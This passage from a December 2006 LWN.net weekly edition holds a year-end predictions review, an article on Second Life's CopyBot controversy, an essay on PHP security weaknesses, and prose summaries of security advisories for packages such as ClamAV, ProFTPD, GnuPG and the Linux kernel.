A 2006 retrospective
This is the last LWN.net Weekly Edition for 2006; following our
longstanding tradition we will take the last week of the year off and
dedicate it to cleaning all of this year's unanswered mail out of our
inboxes. We wish you all a pleasant holiday season; LWN will be back on
its regular schedule on January 4.
Another LWN tradition is to review our predictions made at the beginning of
the year to see just how badly wrong your editor was this time around.
Those predictions were published in the January 4, 2006
edition, for those who wish to follow along from the source. Some of
the comments posted to the article can also be interesting to read with a
year's perspective. We'll not review every prediction made in that
article. Some of them are sufficiently obvious ("Perl 6 will not be
released," "the SCO case will drag on") or general ("the pace of kernel
development will not slow") that little review is called for. Some of the
others, however, offer some insights into how perspectives have changed
over the last year (or, perhaps, how blind your editor was back then).
The very first prediction made was that the GPLv3 process would dominate
the news. Your editor was not able to foresee, however, that the FSF would
take the license revision as an opportunity to attack DRM head-on. What
has happened over the last year, as evidenced by GPLv3 and in other places,
is that many in the community now think that we have enough weight to throw
around in support of goals beyond the simple creation of free software.
Whether the exercise of this weight
will lead to a more free society, or whether it will just make us more like
the entertainment industry (which also thinks it has plenty of weight to
use in pursuing power under copyright law) remains to be seen.
Some commenters doubted your editor's prediction that the non-free kernel
module issue would come to a head this year. But, over the course of this
year, a number of distributors swore off shipping such modules, those which
continue to embrace proprietary modules have taken a fair amount of
criticism, and the kernel developers seriously considered banning them
outright. Whether all that constitutes "coming to a head" can be debated,
but the fact remains: there is a great deal of resentment over proprietary kernel
modules and this issue will not go away anytime soon.
Your editor predicted the return of European software patents. There were
some stirrings over the year, but software patents have, for the most part,
laid low. It would be foolish to believe that they will do so forever,
though.
With regard to desktop Linux, your editor's advice was to not expect
amazing advances, but that there would be steady progress. The movement of
3D technologies onto the Linux desktop may not qualify as an "amazing
advance," but they are a big step regardless; Linux need defer to no other
system in the eye candy department. A prediction that alternatives to
OpenOffice.org would gain prominence did not really come through - but it
is worth noting that the OLPC project has gone with a lightweight version
of AbiWord.
One of the more controversial predictions said that the Fedora Project
would have to make changes to maintain its position. Over the course of
the year, Fedora abandoned the "Fedora Foundation" idea, gave up
(belatedly) on Fedora Legacy, decided to lengthen its support period, and
merged the Core and Extras distributions. The project has picked up a new
energy, renewed its longstanding dedication to free software, and looks
well poised to move forward with a stronger community focus.
Predicting that a Debian release would happen on schedule is always a
daring thing to do. Things clearly did not work out that way, but
substantial progress has been made. Debian Etch might not be that
late, in the end. Predicting Emacs releases is equally risky, and
Emacs 22 did not come out this year - but a couple of pretest releases
did.
Your editor thought that Novell would "get its act together and become a
truly successful Linux-based company." Oh well. That could yet happen,
but, after the events of 2006, few people would see it as a foregone
conclusion.
So what did your editor miss entirely? Big company moves were at the top
of the list. The idea that Novell would make a deal with Microsoft -
paying patent royalties in the process - was beyond your editor's
imagination at the time. Similarly, the notion that Oracle would try to
muscle into Linux support by repackaging Red Hat Enterprise Linux was a
surprise. Free software has reached such a level of importance that the
largest companies out there are paying attention.
Also missed was the open-sourcing of Java, though one could certainly
quibble that we have not actually seen the code yet. Perhaps your editor
should simply predict this event for 2007 and be dead-on. Seriously,
however, this event has been delayed for so long that many of us had
despaired of it ever happening. It does appear, however, that Jonathan
Schwartz has brought a new emphasis on free software to Sun's top position;
the planned release of Java under the GNU General Public License suggests
that he is serious.
In the end, the easiest prediction to make was that our community would
remain healthy, and that our software would continue to get better.
Despite our disagreements and our mistakes we are going from one strength
to the next. That helps make 2006 another pleasant year to look back on.
Comments (16 posted)
The 2006 Linux and free software timeline
For the ninth year in a row, the editors at LWN.net have put together a timeline
highlighting the most important events of the last twelve months.
It has been an active and interesting year - just like the ones before.
The GPLv3 process was launched - and threatened to split our community over
differing views of freedom. Software patent issues came and went. The
Linux desktop went 3D. Large companies became more involved with Linux and
free software - and not everybody is pleased with the result. Distributors
reevaluated and reworked their dealings with the community. And,
while all this was happening, the community continued to produce great code
which made all of our systems better.
This is version 1.0 of the 2006 timeline.
If you find any errors or remaining major omissions, please send them
to us at timeline@lwn.net; please do
not post errors or omissions as comments until after we have had a chance
to address them.
The development of the LWN.net Linux Timeline was supported by LWN
subscribers; if you like what you see, please consider subscribing to LWN.
This year, we are pleased to announce the return of the one big page version as well.
For the historically minded, the timelines for the previous eight years
remain available:
Comments (none posted)
Second Life and Open Source
December 15, 2006
This article was contributed by Glyn Moody
When Larry Lessig
proclaimed that
"code is
law" he was talking metaphorically. But for a virtual world,
constructed entirely out of bits, it is literally true: the laws regarding
what you can and cannot do there, both legally and even physically, are
inscribed in the lines of code that implement it. In this space, then, open
source has an added significance in that it not only lays bare the engines of
creation, but it potentially allows them to be hacked.
What some of the consequences of this openness might be was shown recently in
Second Life, when the
open source project
libsecondlife
released a program called CopyBot. As its name suggests, this tool allowed copies
to be made of in-world objects - including the "avatars" that are used to
represent the residents of Second Life.
This was deeply problematic, since one of the attractions of Second Life is
that creators of digital content retain
ownership,
unlike in most other virtual worlds. Many now make a good living from this
in-world activity selling virtual items, with
some
earning tens of thousands of dollars per year. However, CopyBot raised the
spectre of people replicating content for free, rendering digital objects
valueless, and undermining the entire Second Life economy.
The person leading the libsecondlife project is Jonathan Freedman. He took
over recently after John Hurliman, the previous lead, and still the main
contributor of code to the project, decided he didn't want to deal with the
public relations issues that CopyBot threw up. Freeman recalls: "he said to
me: 'I just want to code, I don't want to deal with this.'"
The libsecondlife project began six months ago, and was started by a group of
coders who "were interested in seeing a little more flexibility in what they
could do with Second Life," as Freedman explains. The idea was to create an
open source library that third parties could employ to create new Second Life
applications. To do that, the libsecondlife group started reverse-engineering
the Second Life protocols.
One by-product of this work was that they turned up security issues - "and
believe you me, they found quite a few," Freedman says - which they reported
to Linden Lab, the company behind Second Life. Partly as a result, "the way
the project had been run impressed Linden Lab, who were very happy with it,"
Freedman explains. "Back in the Second Life Community Convention in August,
they gave their unofficial
endorsement
of the libsecondlife project."
And then along came the CopyBot incident.
"It was a debugging tool," Freedman says of CopyBot. "The developer was working on the
part of the Second Life protocol that was responsible for drawing avatars. He
needed a way to verify that the data was coming correctly: what better way to
verify that than just mirroring it back" down the connection to the system and
observing the result?
Freedman emphasizes that there were safeguards built into ensure that this
"mirroring" - copying of virtual objects - was kept within the terms of
service at the time. "You'd actually have to ask it before it would copy you,
and it would then give you a lengthy disclaimer explaining what was going on
so people could make sure that that was what they wanted. And generally people
were agreeing with that, and they'd be there for five or ten minutes dancing
with themselves."
There the story might have ended, were it not for the fact that CopyBot was
free software. "Anybody could get a copy and make use of it, and that's what
we saw happening: other people were modifying it to take out the disclaimer,
and generally shout stuff like 'I'm stealing your textures'" - the surface
elements of virtual objects.
As well as taunting victims in this way, a few of these "griefers" started
selling the modified, no-holds-barred version of CopyBot within Second Life.
Panic spread in some quarters of Second Life. Shop owners
closed
hundreds of virtual stores, afraid that their inventory would be copied
endlessly and rendered worthless. But in practice, the
damage
was minor, and the economy of Second Life continues to
grow -
not least because CopyBot itself had important limitations that were
consequences of the way Second Life operates.
Each "sim" or simulator of a portion of the virtual world in Second Life is
created on a server running Debian GNU/Linux, Apache, Squid and MySQL;
currently there are several thousand of these PC boxes. To allow for fast
response times, the virtual world is sent not as pixels or even as a mesh, but
as a series of 3D primitives - "prims". The Second Life client creates the
world by converting the stream of information about prims and their position
into a visual representation.
This means that the client has all the structural information about any object
visible to it; CopyBot works by taking that information, and replicating it.
However, in addition to the prims and the textures applied to them, more
complex objects add scripting to provide interactive behaviour that endows
Second Life with much of its richness. These scripts are run server-side, and
are not passed to the client, so CopyBot is unable to intercept them.
Nonetheless, the residents of Second Life who made money from their virtual
creations were understandably perturbed by the appearance of a piece of
software with the provocative name of CopyBot - "in retrospect it probably
could have been named something else," Freedman concedes.
At a November meeting held in-world, Second Life's creator and CEO, Philip
Rosedale,
explained
that nothing could be done about CopyBot using technical means: Second Life's
client-server architecture implied that CopyBot was not just possible but in
some sense inevitable. But he did promise other measures, including more
metadata, such as attribution and creation time-stamps, for virtual objects.
Since these would be stored server-side, and hence immutable, they would
provide clear proof of whether an object had been copied. To give this
approach some teeth, Linden Lab made
clear
that anyone who used CopyBot or something similar in a malicious
manner faced the
prospect of expulsion from Second Life.
Some remain
unhappy
with Rosedale's response, and also see the CopyBot incident as part of a
deeper malaise involving cynical hackers exploiting loopholes in the Second
Life code to grief other residents. They accuse Linden Lab of a certain
complicity because of its encouragement of the external libsecondlife project.
Perhaps that encouragement is not so surprising given Linden Lab's stated
intention [PDF - look at final slides]
to make elements of Second Life open source. "Without speaking to specific
timing or plans - and we've thought and are thinking lots and lots where there
might be exceptions to this - it seems like the best way to allow [Second
Life] to become reliable and scalable and grow," Rosedale said
recently
on the subject of opening up the code. "We've got a lot of smart people here
thinking about that." It's obviously useful to have smart people thinking
about it on the outside too - provided things don't get out of hand.
Freedman has instituted one important change in the libsecondlife project to
try to ensure that another CopyBot does not happen. "Previously, the way the
libsecondlife source tree was done was basically anybody who wants an account
can have one. That's the first thing I changed: just the
core
developers can have the accounts."
Freedman also has some clear-cut goals for the project, which will be
releasing all its code under the BSD license. "Short-term, the aim is to have
a workable third-party library that other people can make use of to interface
with Second Life. I believe that by the middle to end of December we'll have a
fairly decent third-party viewer that's comparable to the Second Life [client]
application. Longer term, ideally we'd like to see a completely open
implementation of Second Life, from the client, to the sims, to the assets -
everything."
Freedman believes "the use of open standards, if not open source, will go a
long way in the propagation of Second Life as an actual platform." This seems
to explain Linden Lab's enthusiasm for libsecondlife and patience with things
like CopyBot. At stake is the chance to help create the next online platform -
the 3D Web, sometimes known as Web 3.D.
Opening up the platform will also take some of the strain off Linden Lab:
currently, Second Life is growing at an unsustainable rate, with over a
million new members joining in the last couple of months. If users could host
their own virtual land, then Second Life could scale more gracefully. Beyond
that, open protocols would allow distinct but
interconnected
virtual worlds to be created. The technical aspects of this are the easy part;
more difficult are working out social and economic issues like making
reputation and money portable between those worlds, and legal ones - as the
CopyBot episode made all-too clear.
Glyn Moody writes about open source and virtual worlds at
opendotdotdot.
Comments (47 posted)
Page editor: Jonathan Corbet
Security
The state of PHP security
December 20, 2006
This article was contributed by Jake Edge.
PHP security has been much in the news lately, mostly centered around the
resignation
of Stefan Esser from the PHP Security Response Team. His stated reasons
for leaving are rather alarming, and he indicates a pattern of slow
responses to security holes within the language itself. Others, including
Zend co-CTO Zeev Suraski,
disagree
and chalk it up to a personality conflict between Esser and the rest of the
team. A recent
look at the
National Vulnerability Database (NVD)
specifically for PHP related security issues also highlights some of the
problems with PHP. It is time, it seems, to take a look at the state of PHP
security.
PHP is touted as an easy language to use to write web applications,
particularly those that use a database for storage. There are no end of
PHP tutorials available on the web that will help readers to get
a web application up and running in short order. Unfortunately, many of these tutorials
completely ignore security and invite their readers to create
applications that suffer from SQL injection and other security flaws. This
example
(from the top ten results of a Google search for 'php tutorial') explains
how to update a record in a MySQL database using single quotes around
the values that come in from a web form. It also describes how to display
data in ways that allow for cross-site scripting.
As described in another security page
article, the proper way to
handle database queries with
user supplied data is by using placeholders. PHP does provide ways to
do that, using the PEAR database API,
but finding information about it is non-trivial. It certainly is not
promoted by the PHP homepage, which tends
to push the included, easily abused, MySQL interface.
Because PHP strives to be easy to use, its developers have added features
that have caused all manner of security problems. The worst offender
is the register_globals 'feature' which automatically instantiates
PHP variables from the CGI variables that are passed in a GET or POST. While
it does make it easier for programmers to access these values, it also allows
attackers to set the value for any uninitialized variable in the PHP program.
Because PHP is a dynamic language, variables do not necessarily need to be
initialized before they are used and many programs relied on that feature.
When combined with register_globals, this practice leads to easy
exploits.
register_globals has long been turned off by default in PHP, but
there are a huge number of applications that still rely on it. Many PHP
web hosting companies have it turned on because their customers demand it, but
it is very difficult to use the feature correctly. There are PHP modes that
warn of using uninitialized variables, but those warnings typically end up
in a log file somewhere which may not be examined frequently. It is an
extremely dubious feature, but one that PHP creator, Rasmus Lerdorf, seems
to think should have been
left on
by default.
Other poor design choices include the 'magic quotes' feature that gives the
illusion of removing SQL injection issues without actually providing that
protection. Another is the ability of the PHP include directive
to take URL arguments; this has been abused by attackers to pick up their
scripts and have them run on the victim's server. Unfortunately, these
features get into the language and are used making it difficult to remove
them later.
There are various projects to improve upon PHP security, including
Esser's Hardened-PHP, as well
as efforts, such as the
PHP Security Consortium, that seek to educate
people about writing secure PHP code. Unfortunately,
many of the open source PHP projects do not provide good examples
for budding PHP programmers to emulate; they either rely upon
various PHP misfeatures and/or they
were written by programmers without the requisite secure coding
skills.
The existence of these projects (and other similar ones) certainly
provides an indication that the security problem with PHP is
acknowledged by some. PHP proponents tend to take a 'blame the user'
approach that is reasonable in some ways, but fails to recognize some
of the inherent issues with PHP itself. If you target inexperienced
web application programmers, you can hardly be surprised that they
do not have fundamental security skills.
Security seems to fall somewhere below simplicity in the minds of the PHP
language developers; that makes it more difficult to have secure PHP
applications. Security is a hard problem and any attempt to 'dumb down'
a language is likely to run into security issues. Encouraging
amateur programmers to write web applications is unlikely to produce secure
code in any language, but by providing tutorials and examples that have glaring
security issues and by not concentrating on teaching secure coding, PHP makes
it that much worse. A great deal of useful code has been written on the
PHP platform; it would be nice to find a way to keep that code coming while
simultaneously making it more secure.
Comments (21 posted)
New vulnerabilities
clamav: stack overflow
| Package(s): | clamav |
CVE #(s): | CVE-2006-6481
|
| Created: | December 15, 2006 |
Updated: | December 20, 2006 |
| Description: |
Hendrik Weimer has reported a vulnerability in ClamAV, which can be
exploited by malicious people to cause a DoS (Denial of Service). The
vulnerability is caused due to a stack overflow when scanning messages with
deeply nested multipart content. This can be exploited to crash the service
by sending specially crafted emails to a vulnerable system. |
| Alerts: |
|
Comments (none posted)
dbus: denial of service
| Package(s): | dbus |
CVE #(s): | CVE-2006-6107
|
| Created: | December 15, 2006 |
Updated: | February 12, 2007 |
| Description: |
Unspecified vulnerability in the match_rule_equal function in bus/signals.c
in D-Bus before 1.0.2 allows local applications to remove match rules for
other applications and cause a denial of service (lost process messages). |
| Alerts: |
|
Comments (none posted)
flash-player: CRLF injection vulnerability
| Package(s): | flash-player |
CVE #(s): | CVE-2006-5330
|
| Created: | December 14, 2006 |
Updated: | December 20, 2006 |
| Description: |
Adobe Flash Player versions below 7.0.69 are vulnerable to a
CRLF injection. Remote attackers can modify HTTP headers in client
requests in order to conduct HTTP Request Splitting attacks via CRLF sequences in arguments to the ActionScript functions XML.addRequestHeader
and XML.contentType. |
| Alerts: |
|
Comments (none posted)
gdm: format string vulnerability
| Package(s): | gdm |
CVE #(s): | CVE-2006-6105
|
| Created: | December 15, 2006 |
Updated: | December 20, 2006 |
| Description: |
The gdmchooser program provides XDMCP (X Display Manager Control Protocol)
functionality to the GNOME Display Manager. This protocol allows a user to
interact remote systems via the local X11 display. See this iDefense advisory for additional information. |
| Alerts: |
|
Comments (1 posted)
gnuradius: format string vulnerability
| Package(s): | gnuradius |
CVE #(s): | CVE-2006-4181
|
| Created: | December 14, 2006 |
Updated: | December 20, 2006 |
| Description: |
GNU Radius has format string vulnerability the sqllog function
that may be used by an attacker for the remote execution of arbitrary code. |
| Alerts: |
|
Comments (none posted)
Mozilla stuff: multiple vulnerabilities
Comments (none posted)
proftpd: stack-based buffer overflow
| Package(s): | proftpd |
CVE #(s): | CVE-2006-6563
|
| Created: | December 18, 2006 |
Updated: | February 14, 2007 |
| Description: |
A vulnerability exists in the FTP server ProFTPD, versions up to and
including 1.3.0a. The vulnerability is caused by a stack-based buffer
overflow in the "pr_ctrls_recv_request" function of the "Controls"
feature. This is an optional feature of ProFTPD server which is by default
disabled in OpenPKG and probably other distributions. |
| Alerts: |
|
Comments (1 posted)
sql-ledger: several remote vulnerabilities
| Package(s): | sql-ledger |
CVE #(s): | CVE-2006-4244
CVE-2006-4731
CVE-2006-5872
|
| Created: | December 18, 2006 |
Updated: | December 20, 2006 |
| Description: |
Several remote vulnerabilities have been discovered in SQL Ledger, a web
based double-entry accounting program, which may lead to the execution
of arbitrary code. |
| Alerts: |
|
Comments (none posted)
Updated vulnerabilities
apache: cross-site scripting
| Package(s): | apache |
CVE #(s): | CVE-2006-3918
|
| Created: | August 9, 2006 |
Updated: | April 4, 2008 |
| Description: |
From the Red Hat advisory: "A bug was found in Apache where an invalid Expect header sent to the server
was returned to the user in an unescaped error message. This could
allow an attacker to perform a cross-site scripting attack if a victim was
tricked into connecting to a site and sending a carefully crafted Expect
header." |
| Alerts: |
|
Comments (none posted)
apache-mod_auth_kerb: off-by-one error
| Package(s): | apache-mod_auth_kerb |
CVE #(s): | CVE-2006-5989
|
| Created: | November 24, 2006 |
Updated: | January 23, 2007 |
| Description: |
An off-by-one error in the der_get_oid function in mod_auth_kerb 5.0 allows
remote attackers to cause a denial of service (crash) via a crafted
Kerberos message that triggers a heap-based buffer overflow in the
component array. |
| Alerts: |
|
Comments (none posted)
avahi: sender id check
| Package(s): | avahi |
CVE #(s): | CVE-2006-5461
|
| Created: | November 13, 2006 |
Updated: | December 20, 2006 |
| Description: |
Steve Grubb discovered that netlink messages were not being checked for
their sender identity. This could lead to local users manipulating the
Avahi service. |
| Alerts: |
|
Comments (1 posted)
bind: denial of service
| Package(s): | bind |
CVE #(s): | CVE-2006-4095
CVE-2006-4096
|
| Created: | September 7, 2006 |
Updated: | February 1, 2007 |
| Description: |
Bind has two denial of service vulnerabilities.
Recursive servers queries for SIG records will trigger an assertion
failure if more than one RR set is returned.
An INSIST failure can be triggered by sending a large number of
recursive queries. |
| Alerts: |
|
Comments (none posted)
bugzilla: multiple vulnerabilities
| Package(s): | bugzilla |
CVE #(s): | CVE-2006-5453
CVE-2006-5454
CVE-2006-5455
|
| Created: | November 10, 2006 |
Updated: | August 28, 2007 |
| Description: |
Bugzilla has the following vulnerabilities:
Input data passed to various fields is not properly sanitized before
being passed back to users.
Users can gain unauthorized access to read attachment
descriptions while using diff mode.
HTTP GET and HTTP POST requests can be used to perform unauthorized
actions due to improper verification.
Input that is passed to showdependencygraph.cgi is not properly
sanitized before being returned to users. |
| Alerts: |
|
Comments (none posted)
busybox: insecure password generation
| Package(s): | busybox |
CVE #(s): | CVE-2006-1058
|
| Created: | May 5, 2006 |
Updated: | May 2, 2007 |
| Description: |
The BusyBox 1.1.1 passwd command does not use a proper salt when generating
passwords. This would create an instance where a brute force attack could
take very little time. |
| Alerts: |
|
Comments (2 posted)
bzip2: race condition and infinite loop
| Package(s): | bzip2 |
CVE #(s): | CAN-2005-0953
CAN-2005-1260
|
| Created: | May 17, 2005 |
Updated: | January 10, 2007 |
| Description: |
A race condition in bzip2 1.0.2 and earlier allows local users to modify
permissions of arbitrary files via a hard link attack on a file while it is
being decompressed, whose permissions are changed by bzip2 after the
decompression is complete. Also specially crafted bzip2 archives may cause
an infinite loop in the decompressor. |
| Alerts: |
|
Comments (2 posted)
clamav: missing sanity checks
| Package(s): | clamav |
CVE #(s): | CVE-2006-5874
|
| Created: | December 11, 2006 |
Updated: | December 14, 2006 |
| Description: |
Stephen Gran discovered that malformed base64-encoded MIME attachments
can lead to denial of service through a null pointer dereference. |
| Alerts: |
|
Comments (none posted)
cpio: arbitrary code execution
| Package(s): | cpio |
CVE #(s): | CVE-2005-4268
|
| Created: | January 2, 2006 |
Updated: | May 8, 2007 |
| Description: |
Richard Harms discovered that cpio did not sufficiently validate file
properties when creating archives. Files with e. g. a very large size
caused a buffer overflow. By tricking a user or an automatic backup
system into putting a specially crafted file into a cpio archive, a
local attacker could probably exploit this to execute arbitrary code
with the privileges of the target user (which is likely root in an
automatic backup system). |
| Alerts: |
|
Comments (none posted)
Cyrus-SASL: DIGEST-MD5 Pre-Authentication Denial of Service
| Package(s): | cyrus-sasl |
CVE #(s): | CVE-2006-1721
|
| Created: | April 21, 2006 |
Updated: | September 4, 2007 |
| Description: |
Cyrus-SASL contains an unspecified vulnerability in the DIGEST-MD5
process that could lead to a Denial of Service. An attacker could possibly
exploit this vulnerability by sending specially crafted data stream to the
Cyrus-SASL server, resulting in a Denial of Service even if the attacker is
not able to authenticate. |
| Alerts: |
|
Comments (none posted)
dovecot: index cache file handling error
| Package(s): | dovecot |
CVE #(s): | CVE-2006-5973
|
| Created: | November 29, 2006 |
Updated: | May 8, 2007 |
| Description: |
The dovecot IMAP server has an error in its index cache file handling code which could be exploited by an authenticated user to execute arbitrary code. Only servers with the (non-default) mmap_disable=yes option setting are vulnerable. |
| Alerts: |
|
Comments (none posted)
elinks: arbitrary file access
| Package(s): | elinks |
CVE #(s): | CVE-2006-5925
|
| Created: | November 16, 2006 |
Updated: | February 1, 2007 |
| Description: |
The elinks text-mode browser has an arbitrary file access vulnerability
in the Elinks SMB protocol handler. If a user can be tricked into
visiting a specially crafted web page, arbitrary files may be read or
written with the user's permissions. |
| Alerts: |
|
Comments (none posted)
enemies-of-carlotta: input sanitizing
| Package(s): | enemies-of-carlotta |
CVE #(s): | CVE-2006-5875
|
| Created: | December 13, 2006 |
Updated: | December 13, 2006 |
| Description: |
It would seem that enemies-of-carlotta, a mailing list manager, does not check email addresses before passing them to a shell. |
| Alerts: |
|
Comments (none posted)
ffmpeg: buffer overflows
| Package(s): | ffmpeg |
CVE #(s): | CVE-2006-4799
CVE-2006-4800
|
| Created: | September 14, 2006 |
Updated: | May 28, 2007 |
| Description: |
the AVI processing code in FFmpeg has a number of buffer overflow
vulnerabilities.
If an attacker can trick a user into loading a specially crafted
crafted AVI, arbitrary code can be executed with the user's privileges. |
| Alerts: |
|
Comments (2 posted)
freeradius: several vulnerabilities
| Package(s): | freeradius |
CVE #(s): | CVE-2005-4745
CVE-2005-4746
|
| Created: | August 8, 2006 |
Updated: | April 24, 2007 |
| Description: |
Several remote vulnerabilities have been discovered in freeradius, a
high-performance RADIUS server, which may lead to SQL injection or denial
of service. |
| Alerts: |
|
Comments (none posted)
freetype: integer overflows
| Package(s): | freetype |
CVE #(s): | CVE-2006-0747
CVE-2006-1861
CVE-2006-2493
CVE-2006-2661
CVE-2006-3467
|
| Created: | June 8, 2006 |
Updated: | October 10, 2007 |
| Description: |
The FreeType library has several integer overflow vulnerabilities.
If a user can be tricked into installing a specially
crafted font file, arbitrary code can be executed with the privilege
of the user. |
| Alerts: |
|
Comments (none posted)
ftpd: privilege escalation
| Package(s): | ftpd |
CVE #(s): | CVE-2006-5778
|
| Created: | November 10, 2006 |
Updated: | February 14, 2007 |
| Description: |
Ftpd is vulnerable to a privilege escalation attack,
an incorrect seteuid() call can be used by an FTP user to gain
unauthorized access to files or directories. |
| Alerts: |
|
Comments (none posted)
gcc: file overwrite vulnerability
| Package(s): | gcc |
CVE #(s): | CVE-2006-3619
|
| Created: | September 6, 2006 |
Updated: | March 14, 2008 |
| Description: |
The fastjar utility found in the GNU compiler collection does not perform adequate file path checking, allowing the creation or overwriting of files outside of the current directory tree. |
| Alerts: |
|
Comments (none posted)
gdb: buffer overflow
| Package(s): | gdb |
CVE #(s): | CVE-2006-4146
|
| Created: | September 15, 2006 |
Updated: | June 12, 2007 |
| Description: |
A buffer overflow in dwarfread.c and dwarf2read.c debugging code in GNU
Debugger (GDB) 6.5 allows user-assisted attackers, or restricted users, to
execute arbitrary code via a crafted file with a location block
(DW_FORM_block) that contains a large number of operations. |
| Alerts: |
|
Comments (none posted)
gdm: improper file permissions
| Package(s): | gdm |
CVE #(s): | CVE-2006-1057
|
| Created: | April 19, 2006 |
Updated: | May 2, 2007 |
| Description: |
The .ICEauthority file may be created with the wrong ownership and permissions; gdm 2.14.2 fixes the problem. |
| Alerts: |
|
Comments (none posted)
gnupg: stack overwrite
| Package(s): | gnupg |
CVE #(s): | CVE-2006-6235
|
| Created: | December 12, 2006 |
Updated: | March 13, 2007 |
| Description: |
A "stack overwrite" vulnerability in GnuPG (gpg) allows attackers to
execute arbitrary code via crafted OpenPGP packets that cause GnuPG to
dereference a function pointer from deallocated stack memory. |
| Alerts: |
|
Comments (3 posted)
gv: stack-based buffer overflow
| Package(s): | gv |
CVE #(s): | CVE-2006-5864
|
| Created: | November 20, 2006 |
Updated: | April 9, 2007 |
| Description: |
Stack-based buffer overflow in the ps_gettext function in ps.c for GNU gv
3.6.2, and possibly earlier versions, allows user-assisted attackers to
execute arbitrary code via a PostScript (PS) file with certain headers that
contain long comments, as demonstrated using the DocumentMedia header. |
| Alerts: |
|
Comments (none posted)
gzip: multiple vulnerabilities
| Package(s): | gzip |
CVE #(s): | CVE-2006-4334
CVE-2006-4335
CVE-2006-4336
CVE-2006-4337
CVE-2006-4338
|
| Created: | September 19, 2006 |
Updated: | June 1, 2007 |
| Description: |
Tavis Ormandy of the Google Security Team discovered two denial of service
flaws in the way gzip expanded archive files. If a victim expanded a
specially crafted archive, it could cause the gzip executable to hang or
crash.
Tavis Ormandy of the Google Security Team discovered several code execution
flaws in the way gzip expanded archive files. If a victim expanded a
specially crafted archive, it could cause the gzip executable to crash or
execute arbitrary code. |
| Alerts: |
|
Comments (1 posted)
gzip: arbitrary command execution
| Package(s): | gzip |
CVE #(s): | CAN-2005-0758
|
| Created: | August 1, 2005 |
Updated: | January 9, 2007 |
| Description: |
zgrep in gzip before 1.3.5 does not handle shell metacharacters like '|'
and '&' properly when they occurred in input file names. This could be
exploited to execute arbitrary commands with user privileges if zgrep is
run in an untrusted directory with specially crafted file names. |
| Alerts: |
|
Comments (2 posted)
imagemagick: buffer overflows
| Package(s): | imagemagick |
CVE #(s): | CVE-2006-5868
|
| Created: | November 28, 2006 |
Updated: | February 16, 2007 |
| Description: |
Daniel Kobras discovered multiple buffer overflows in ImageMagick's SGI
file format decoder. By tricking a user or an automated system into
processing a specially crafted SGI image, this could be exploited to
execute arbitrary code with the user's privileges. |
| Alerts: |
|
Comments (1 posted)
ImageMagick: buffer overflows
| Package(s): | ImageMagick |
CVE #(s): | CVE-2006-5456
|
| Created: | October 31, 2006 |
Updated: | March 8, 2007 |
| Description: |
Multiple buffer overflows in GraphicsMagick before 1.1.7 and ImageMagick
6.0.7 allow user-assisted attackers to cause a denial of service and
possibly execute execute arbitrary code via (1) a DCM image that is not
properly handled by the ReadDCMImage function in coders/dcm.c, or (2) a
PALM image that is not properly handled by the ReadPALMImage function in
coders/palm.c. |
| Alerts: |
|
Comments (2 posted)
imlib2: arbitrary code execution
| Package(s): | imlib2 |
CVE #(s): | CVE-2006-4806
CVE-2006-4807
CVE-2006-4808
CVE-2006-4809
|
| Created: | November 6, 2006 |
Updated: | August 13, 2007 |
| Description: |
M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the
validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user
were tricked into viewing or processing a specially crafted image with
an application that uses imlib2, the flaws could be exploited to execute
arbitrary code with the user's privileges. |
| Alerts: |
|
Comments (none posted)
kdegraphics: stack overflow
| Package(s): | kdegraphics |
CVE #(s): | CVE-2006-6297
|
| Created: | December 12, 2006 |
Updated: | January 13, 2007 |
| Description: |
A stack overflow in the KFILE JPEG (kfile_jpeg) plugin in kdegraphics3, as
used by konqueror, digikam, and other KDE image browsers, allows remote
attackers to cause a denial of service (stack consumption) via a crafted
EXIF section in a JPEG file, which results in an infinite recursion. |
| Alerts: |
|
Comments (none posted)
kdelibs: integer overflow
| Package(s): | kdelibs |
CVE #(s): | CVE-2006-4811
|
| Created: | October 18, 2006 |
Updated: | March 5, 2007 |
| Description: |
The KDE khtml library can pass untrusted parameters into Qt, allowing a hostile user to trigger an integer overflow there and execute arbitrary code. |
| Alerts: |
|
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
CVE #(s): | CVE-2006-4623
|
| Created: | October 18, 2006 |
Updated: | November 14, 2007 |
| Description: |
The kernel DVB layer can be caused to crash with maliciously-formatted unidirectional lightweight encapsulation (ULE) data. |
| Alerts: |
|
Comments (none posted)
kernel: bridging code buffer overflow
| Package(s): | kernel |
CVE #(s): | CVE-2006-5751
|
| Created: | December 6, 2006 |
Updated: | January 3, 2007 |
| Description: |
A buffer overflow in the bridging code in kernels through 2.6.18.3 can lead to a denial of service or potential code execution. The 2.6.18.4 kernel contains the fix. |
| Alerts: |
|
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
CVE #(s): | CVE-2006-4535
CVE-2006-4538
|
| Created: | September 18, 2006 |
Updated: | December 3, 2007 |
| Description: |
Sridhar Samudrala discovered a local denial of service vulnerability
in the handling of SCTP sockets. By opening such a socket with a
special SO_LINGER value, a local attacker could exploit this to crash
the kernel. (CVE-2006-4535)
Kirill Korotaev discovered that the ELF loader on the ia64 and sparc
platforms did not sufficiently verify the memory layout. By attempting
to execute a specially crafted executable, a local user could exploit
this to crash the kernel. (CVE-2006-4538) |
| Alerts: |
|
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
CVE #(s): | CVE-2006-4572
CVE-2006-4997
|
| Created: | November 6, 2006 |
Updated: | January 17, 2007 |
| Description: |
Some vulnerabilities were discovered in the Linux 2.6 kernel:
There are possibly exploitable bugs in the netfilter for IPv6 code.
(CVE-2006-4572)
The ATM subsystem of the Linux kernel could allow a remote attacker to
cause a Denial of Service (panic) via unknown vectors that cause the ATM
subsystem to access the memory of socket buffers after they are freed.
(CVE-2006-4997) |
| Alerts: |
|
Comments (none posted)
kernel: denial of service by memory consumption
| Package(s): | kernel |
CVE #(s): | CVE-2006-2936
|
| Created: | July 17, 2006 |
Updated: | November 14, 2007 |
| Description: |
The ftdi_sio driver (usb/serial/ftdi_sio.c) in Linux kernel 2.6.x up to
2.6.17, and possibly later versions, allows local users to cause a denial
of service (memory consumption) by writing more data to the serial port
than the driver can handle, which causes the data to be queued. |
| Alerts: |
|
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
CVE #(s): | CVE-2006-5757
|
| Created: | November 13, 2006 |
Updated: | November 14, 2007 |
| Description: |
From the MOKB-05-11-2006
advisory: "The ISO9660 filesystem handling code of the Linux
2.6.x kernel fails to properly handle corrupted data structures, leading to
an exploitable denial of service condition. This particular vulnerability
